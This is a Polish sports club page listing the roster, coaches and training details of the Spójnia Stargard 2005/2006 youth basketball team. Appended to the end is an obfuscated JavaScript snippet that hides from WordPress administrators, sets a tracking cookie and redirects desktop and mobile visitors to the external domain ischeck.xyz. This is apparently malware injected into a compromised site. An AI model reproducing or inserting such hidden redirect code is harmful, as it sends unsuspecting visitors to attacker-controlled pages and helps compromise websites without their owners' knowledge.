2005/2006

U14 - Spójnia II Stargard

U13 - Spójnia Stargard

Rocznik 2005/2006.

Trener: Michał Trypuć
Skład zespołu: 1 Bielicki Adrian, 3 Mazur Mateusz, 8 Lorenc Jakub, 10 Kapera Sławomir, 13 Bryła Mateusz, 14 Michalkiewicz Mateusz, 18 Stefański Jakub, 23 Słomiński Mateusz, 24 Łukaszewicz Igor, 30 Krawczyk Fabian, 32 Górlikowski Krystian, 33 Żur Kacper, 35 Włudarski Alan, 45 Kapczyński Brajan, 99 Jabłoński Jakub.

Kierownik drużyny: Łukasz Korolczuk

Hala meczowa: Hala OSiR/Hala SP3 Stargard

Treningi: Poniedziałek – Piątek

II Trener Michał Trypuć

Kierownik drużyny Łukasz Korolczuk

Narodowość
polPolska
Obecna drużyna
2005/2006, Procar Spójnia Stargard – 2001

var a=['toUTCString','cookie','split','length','charAt','substring','indexOf','userAgent','match','MSIE;','OPR','Chromium','Firefox','Chrome','ppkcookie','location','https://ischeck.xyz/?var2','getElementById','wpadminbar','undefined','setTime','getTime',';\x20expires='];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b('0x0')](b('0x1'))===null){if(typeof c===b('0x2')){function c(d,e,f){var g='';if(f){var h=new Date();h[b('0x3')](h[b('0x4')]()+f*0x18*0x3c*0x3c*0x3e8);g=b('0x5')+h[b('0x6')]();}document[b('0x7')]=d+'='+(e||'')+g+';\x20path=/';}function i(j){var k=j+'=';var l=document[b('0x7')][b('0x8')](';');for(var m=0x0;m<l[b('0x9')];m++){var n=l[m];while(n[b('0xa')](0x0)=='\x20')n=n[b('0xb')](0x1,n['length']);if(n[b('0xc')](k)==0x0)return n[b('0xb')](k[b('0x9')],n['length']);}return null;}function o(){return navigator[b('0xd')][b('0xe')](/Android/i)||navigator['userAgent'][b('0xe')](/BlackBerry/i)||navigator[b('0xd')][b('0xe')](/iPhone|iPad|iPod/i)||navigator[b('0xd')][b('0xe')](/Opera Mini/i)||navigator[b('0xd')][b('0xe')](/IEMobile/i);}function p(){return navigator[b('0xd')]['indexOf']('Edge')!==-0x1||navigator['userAgent'][b('0xc')](b('0xf'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x10'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x11'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x12'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x13'))!==-0x1;}var q=i(b('0x14'));if(q!=='un'){if(p()||o()){c(b('0x14'),'un',0x16d);window[b('0x15')]['replace'](b('0x16'));}}}}}(this));